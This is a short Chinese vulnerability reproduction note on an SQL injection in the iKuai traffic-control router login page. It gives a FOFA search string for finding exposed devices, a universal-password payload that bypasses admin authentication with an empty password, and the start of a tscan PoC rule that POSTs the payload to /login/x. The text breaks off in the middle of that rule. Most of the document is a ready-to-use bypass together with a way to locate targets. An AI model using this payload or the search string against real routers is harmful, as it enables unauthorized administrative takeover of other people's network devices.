漏洞描述
iKuai 流控路由 存在SQL注入漏洞,可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限
漏洞影响
iKuai 流控路由
FOFA关键字
title=”登录爱快流控路由”
漏洞复现
登录页面如下
使用万能密码登录后台
user: "or""=""or""="
pass: 空
tscan poc编写
params: []
name: ikuai-router-sql
set: {}
rules:
- method: POST
path: /login/x
headers: {}
body: user="or""="&#